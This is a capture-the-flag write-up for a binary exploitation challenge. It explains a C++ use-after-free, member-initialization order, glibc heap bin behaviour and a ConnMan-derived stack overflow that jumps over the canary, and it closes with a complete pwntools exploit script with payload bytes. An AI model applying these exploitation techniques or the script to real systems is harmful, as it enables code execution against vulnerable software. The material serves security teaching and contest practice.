Apr 2, 2023 |

This challenge was a bit about C++ behavior, and a real life vulnerability! Here’s the description:

I use whatever compiler gives me the least warnings 🤷‍♂️. Wait, you’re saying everyone just ignores warnings anyways? Dope. Let’s fly

We are given a docker.tar.bz2 file which could be imported with the following command.

cat docker.tar.bz2 | docker load

After loading this, and running the corresponding container we can see the source code given in static/main.cpp and the binary loaded in challenge/warning. Taking a quick look at the main function in the provided source we see the following:

int main(){
    // Shamelessly stolen from pedant
    int timeout = 120;
    char *timeout_str = getenv("TIMEOUT");
    if (timeout_str) {
        timeout = atoi(timeout_str);
    }
    signal(SIGALRM, timeout_func);
    alarm(timeout+2);
    signal(SIGPIPE, SIG_IGN);

    std::cout << "> " << std::flush;

    // I really hate C++
    {
        std::string s;
        std::cin >> s;
    }

    Warning* w0 = new Warning();

    if(!w0->check(1)){
        goodbye();
    }

    Warning* w1 = new Warning();

    flushcin();
    w0->get_str();

    if(!w1->check(2)){
        goodbye();
    }

    // I'll just give you the leak. Screw it
    printf("get_flag: %p\n", get_flag);

    w1->get_input();

    return 0;
}

Mostly straight forward, except for the interesting sub-scoped block:

    // I really hate C++
    {
        std::string s;
        std::cin >> s;
    }

This is where the first bug comes from. But first, what is the check function?

bool Warning::check(uint8_t lvl){
    switch(lvl){
        case 1:
            std::cout << "Case 1: " << 0x1000 << std::endl;
            if((a+b-c) == 0x1000){
                std::cout << "Nice." << std::endl;
                return true;
            }
            return false;
        case 2:
            std::cout << "Case 2: " << -256 << std::endl;
            if(a == -256){
                std::cout << "Nicee." << std::endl;
                return true;
            }
            return false;
        default:
            return false;
    }

    return false;
}

This function is performing arithmetic on various members of the Warning:: class. What is this class defined as?

class Warning{
    public:
        Warning( );
        ~Warning();
        void get_str();
        void get_input();
        void jump_around(char *start, char *end, char *uncompressed, size_t uncomp_len);
        void output();
        bool check(uint8_t lvl);
    protected:
        int a;
        int b;
        int c;
        char buf[0x10C];
};

And its constructor…

// I hate c++
Warning::Warning():
    c( 10 ),
    b( c+20 ),
    a( b-5 ){
}

# Fun with C++

When we encounter the string object, and leave the { ... } scope, the string object will call its destructor. Unfortunately for the program, this space, if a large enough string object was given, will be used again when the call to Warning* w0 = new Warning(); is made. None of the functions are overflown, but the private members are. This allows us to satisfy the condition if((a+b-c) == 0x1000) in Warning::check. Based on the code, it looks like Warning::’s constructor will initialize c first, and populate b and then a accordingly. However, looking at the disassembely this is shown to not be the case.

Dump of assembler code for function _ZN7WarningC2Ev:
   0x0000555555556994 <+0>:     endbr64
   0x0000555555556998 <+4>:     push   rbp
   0x0000555555556999 <+5>:     mov    rbp,rsp
   0x000055555555699c <+8>:     mov    QWORD PTR [rbp-0x8],rdi
   0x00005555555569a0 <+12>:    mov    rax,QWORD PTR [rbp-0x8]
   0x00005555555569a4 <+16>:    mov    eax,DWORD PTR [rax+0x4]
   0x00005555555569a7 <+19>:    lea    edx,[rax-0x5]           ; A is first initilized with B - 0x5
   0x00005555555569aa <+22>:    mov    rax,QWORD PTR [rbp-0x8]
   0x00005555555569ae <+26>:    mov    DWORD PTR [rax],edx   
   0x00005555555569b0 <+28>:    mov    rax,QWORD PTR [rbp-0x8]
   0x00005555555569b4 <+32>:    mov    eax,DWORD PTR [rax+0x8]
   0x00005555555569b7 <+35>:    lea    edx,[rax+0x14]          ; B is then initialized with C + 0x14
   0x00005555555569ba <+38>:    mov    rax,QWORD PTR [rbp-0x8]
   0x00005555555569be <+42>:    mov    DWORD PTR [rax+0x4],edx
   0x00005555555569c1 <+45>:    mov    rax,QWORD PTR [rbp-0x8]
   0x00005555555569c5 <+49>:    mov    DWORD PTR [rax+0x8],0xa ; C is then initilized with 0xa
   0x00005555555569cc <+56>:    nop
   0x00005555555569cd <+57>:    pop    rbp
   0x00005555555569ce <+58>:    ret

# Variable initialization

So why is A being initialized first, followed by B, then C? Well, this has to do with the ordering of the variables in the class declaration when using member list initialization. For example, consider the following two classes. In the below example, the ordering is a,b,c.

class Warning {
    public:
        Warning( );
        ~Warning();
    private:
        int a;
        int b;
        int c;
        char buf[0x10C];
};

Which will result in the following constructor.

Dump of assembler code for function _ZN8Warning3C2Ev:
   0x000000000040131c <+0>:     push   rbp
   0x000000000040131d <+1>:     mov    rbp,rsp
   0x0000000000401320 <+4>:     mov    QWORD PTR [rbp-0x8],rdi
   0x0000000000401324 <+8>:     mov    rax,QWORD PTR [rbp-0x8]
   0x0000000000401328 <+12>:    mov    eax,DWORD PTR [rax+0x4]
   0x000000000040132b <+15>:    lea    edx,[rax-0xa]          ; A is first initilized with B - 0xa
   0x000000000040132e <+18>:    mov    rax,QWORD PTR [rbp-0x8]
   0x0000000000401332 <+22>:    mov    DWORD PTR [rax],edx
   0x0000000000401334 <+24>:    mov    rax,QWORD PTR [rbp-0x8]
   0x0000000000401338 <+28>:    mov    eax,DWORD PTR [rax+0x8]
   0x000000000040133b <+31>:    lea    edx,[rax+0x5]          ; B is then initilized with C + 0x5
   0x000000000040133e <+34>:    mov    rax,QWORD PTR [rbp-0x8]
   0x0000000000401342 <+38>:    mov    DWORD PTR [rax+0x4],edx
   0x0000000000401345 <+41>:    mov    rax,QWORD PTR [rbp-0x8]
   0x0000000000401349 <+45>:    mov    DWORD PTR [rax+0x8],0xa; C is the initilized with 0xa
   0x0000000000401350 <+52>:    nop
   0x0000000000401351 <+53>:    pop    rbp
   0x0000000000401352 <+54>:    ret

And in the below example the ordering is c,b,a.

class Warning {
    public:
        Warning( );
        ~Warning();
    private:
        int c;
        int b;
        int a;
        char buf[0x10C];
};

Produces the following constructor.

Dump of assembler code for function _ZN8Warning4C2Ev:
   0x00000000004013e0 <+0>:     push   rbp
   0x00000000004013e1 <+1>:     mov    rbp,rsp
   0x00000000004013e4 <+4>:     mov    QWORD PTR [rbp-0x8],rdi
   0x00000000004013e8 <+8>:     mov    rax,QWORD PTR [rbp-0x8]
   0x00000000004013ec <+12>:    mov    DWORD PTR [rax],0xa    ; C is first initilized with 0xa
   0x00000000004013f2 <+18>:    mov    rax,QWORD PTR [rbp-0x8]
   0x00000000004013f6 <+22>:    mov    eax,DWORD PTR [rax]
   0x00000000004013f8 <+24>:    lea    edx,[rax+0x5]          ; B is then initilized with C + 0x5
   0x00000000004013fb <+27>:    mov    rax,QWORD PTR [rbp-0x8]
   0x00000000004013ff <+31>:    mov    DWORD PTR [rax+0x4],edx
   0x0000000000401402 <+34>:    mov    rax,QWORD PTR [rbp-0x8]
   0x0000000000401406 <+38>:    mov    eax,DWORD PTR [rax+0x4]
   0x0000000000401409 <+41>:    lea    edx,[rax-0xa]          ; A is then initilized with B - 0xa
   0x000000000040140c <+44>:    mov    rax,QWORD PTR [rbp-0x8]
   0x0000000000401410 <+48>:    mov    DWORD PTR [rax+0x8],edx
   0x0000000000401413 <+51>:    nop
   0x0000000000401414 <+52>:    pop    rbp
   0x0000000000401415 <+53>:    ret

Even with the same constructors, these will have their variables initialized in the complete opposite order! Neat.

If we can somehow force the allocation to happen on a location we have used, this will result in us being able to control the a and b members of the Warning:: class.

# Messing with the constructor

We can clearly see what we want to target now. We can send the following data for our new Warning:: object to use.

_satisfy_w0_check = b'\x00\x08\x00\x00' + b'\xfb\x07\x00\x00' + b'\x00\x08\x00\x00' + b'A' * 0x400

But why is this extra padding needed?

# Differences between TCACHEBINS and SMALLBINS

When freeing on the heap, if the chunk size is under 0x410, then it will be released into a tcache bin. This is not what we want here, as when this happens, some data at the start is overwritten. This can be seen in malloc/malloc.c source code:

static __always_inline void
tcache_put (mchunkptr chunk, size_t tc_idx)
{
  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);

  /* Mark this chunk as "in the tcache" so the test in _int_free will
     detect a double free.  */
  e->key = tcache_key;

  e->next = PROTECT_PTR (&e->next, tcache->entries[tc_idx]);
  tcache->entries[tc_idx] = e;
  ++(tcache->counts[tc_idx]);
}

Because this is not what we want, we need to have some allocation over 0x410 bytes. This is why we pad the initial _satisfy_w0_check with a size of 0x400. This causes our next free to place our chunk into a smallbin, and the next call to malloc will return this chunk, without overwriting any of our data.

After satisfying the w0->check(), we have yet another check to pass, in the new Warning:: object’s call to check. This time we are needing to satisfy that a==-256. With what we know about this objects constructor, this should be rather easy to pass.

We pad our initial value with an extra 280 bytes, which is the exact size of the Warning:: object plus heap metadata plus the size of an int, and simply append four \xff’s to the end. The X’s are simply more padding to ensure ending up in the smallbin. We are not overwriting w1->a initially, but w1->b and taking advantage of the constructor to cause w1->a to be initialized to w1->b minus 5.

_satisfy_both_checks =  b'\x00\x08\x00\x00' + b'\xfb\x07\x00\x00' + b'\x00\x08\x00\x00' + (b'A' * 280) + b'\xff' * 4 
_satisfy_both_checks += b'X' * 0x300

After sending this data, here is what the top of the w1 object looks like.

Chunk(addr=0x556742cc1bc0, size=0x120, flags=PREV_INUSE)
    [0x0000556742cc1bc0     fa ff ff ff 6c 58 58 58 0a 00 00 00 58 58 58 58    ....lXXX....XXXX]

The w0 object at this point is:

Chunk(addr=0x556742cc1aa0, size=0x120, flags=PREV_INUSE)
    [0x0000556742cc1aa0     f6 07 00 00 14 08 00 00 0a 00 00 00 41 41 41 41    ............AAAA]

Finally, we make a call to w0->get_str() of exactly 0x115 will fill the buffer at 0x0000556742cc1aab. Doing some quick math, we can see that 0x0000556742cc1aab+0x115 is exactly the start of our w1 object. Reading the fgets man page…

fgets() reads in at most one less than size characters from stream and stores them into the buffer pointed to by s. Reading stops after an EOF or a newline. If a newline is read, it is stored into the buffer. A terminating null byte (’\0’) is stored after the last character in the buffer.

We can write a nullbyte into the w1->a variable. Our final w1 object after the read will look like:

Chunk(addr=0x556742cc1bc0,, size=0x4242424242424240, flags=! PREV_INUSE|IS_MMAPPED)
    [0x556742cc1bc0     00 ff ff ff 6c 58 58 58 0a 00 00 00 58 58 58 58    ....lXXX....XXXX]

And we pass through all the checks! After which, the author was nice enough to give us a infoleak for a nice little ret2win.

# Getting jumpy

Next, w1->get_input(); is called. This function follows

void Warning::get_input(){
    struct {
        char buf1[1025];
        char buf2[257];
    } input_bufs = {0};

    flushcin();
    std::cout << "> ";
    if(!fgets(input_bufs.buf1, sizeof(input_bufs.buf1), stdin)){
                exit(-1);
        }
    // Do you like TBONE steak?
    jump_around(input_bufs.buf1,
                input_bufs.buf1 + 1024,
                input_bufs.buf2,
                sizeof(input_bufs.buf2));

    printf("Jump! Jump! Jump! Jump!\n");
}

Not much going on here, on to jump_around

// Pack it up, pack it in, let me begin
void Warning::jump_around(char *start,
                          char *end,
                          char *uncompressed,
                          size_t uncomp_len){
    // wow this whole function seems so contrived
    // it makes literally no sense
    char *uptr = uncompressed;
    char *bptr = start;
    // The bug in this function would never b a bug in real life
    while(bptr < end && uptr < (uncompressed + uncomp_len)){
        size_t ulen;
        size_t pos = 0;
        char name[63] = {0};

#if !USERINPUT
                if (!convert_label(start, end, ptr, name, NS_MAXLABEL,
                                        &pos, &comp_pos))
                        goto out;

        /*
        * Copy the uncompressed resource record, type, class and \0 to
        * tmp buffer.
        */
#else
        // Give me your con man name
        std::cout << "> ";
        fgets(name, sizeof(name), stdin);

                ulen = strnlen(name, sizeof(name));
#endif
        // Error checking, thats good
        if((uptr - uncompressed) > uncomp_len){
            return;
        }
        strncpy(uptr, name, uncomp_len - (uptr - uncompressed));
        // C++ but pointer math? :thinking_face:
        uptr += ulen;
                *uptr++ = '\0';

        bptr += pos;

        memcpy(uptr, bptr, 10);

        bptr += 10;
        uptr += 10;
    }

    return;
}

Alright, there’s a lot more going on here. The bug arises from the fact there is no out of bounds length checking on the memcpy, and the value of ulen can cause uptr to be out of bounds in some situations. Because of this, we can overflow the buffer. Usually with stack canaries this has limited impact, however in this case we can carefully craft our input to “jump” over the canary. Note the uptr += ulen; line that causes this.

Sending the first two buffers of max length, and a final buffer with a size of 0x33 will let us do this. When we process the strnlen() of our final buffer, we only strncpy a total of uncomp_len - (uptr - uncompressed), which is where the issue comes from. We still add the strnlen to our buffer, and this lets us “jump” over the stack cookie. We can send an input of 30 padding bytes, and our desired return address. With this, we redirect code execution where ever we want. Here is what this looks like in code.

_get = 30
p.send(b'A' * _get + p64(_offset) + b'A' * (0x400 - _get)) ; PADDING before overwriting RIP
print(p.recv(timeout=1))

buf = b'\x01' *0x3d + b'\x02'                              ; Fill up the buffer
buf += buf * 2
buf += b'\xaa' * (0x3d-10) + b'\x00'                       ; This wont finish a full copy, but the length is important
p.sendline(buf)

# Putting it all together

With all that in mind, here is what the final exploit looks like.

from pwn import *
from binascii import hexlify, unhexlify

context.terminal = ['tmux', 'splitw', '-h']

_ticket = "TICKET"

g = cyclic_gen()
_remote = 0
if _remote:
    p = remote("warning.quals2023-kah5Aiv9.satellitesabove.me",5300)
    p.sendline(_ticket.encode())
else:
    p = process("./warning")

print(p.recvuntil(b'> '))

p.sendline(b'\x00\x08\x00\x00' + b'\xfb\x07\x00\x00' + b'\x00\x08\x00\x00' + b'A' * (280) + b'\xff\xff\xff\xff' +b'X' * 0x300)

print(p.recvline())
print(p.recvline())
print(p.recvuntil(b'> '))

print("sending first payload")

p.sendline(b"B"*0x114)

p.recvline()
p.recvline()

leak = p.recvline()
print(leak)
_offset = int(leak.split(b' ')[1][:-1],16)

print("Got leaked funciton: " + hex(_offset))

_get = 30
p.send(b'A' * _get + p64(_offset) + b'A' * (0x400 - _get))
print(p.recv(timeout=1))

buf = b'\x01' *0x3d + b'\x02'
buf += buf * 2
buf += b'\xaa' * (0x3d-10) + b'\x00'
p.sendline(buf)

print(p.recvuntil(b'> '))

print(p.recvline())
print(p.recvline())

Run it, and get the flag.

# Misc

The jump_around function was an actual vulnerable function in the ConnMan(v1.37) network manager that was used by the Tesla Model 3. The bug was leveraged by the team at comsecuris to exploit the Model 3 at the 2020 Pwn2Own competition! Super cool stuff.

The version of glibc that was used in this challenge is 2.35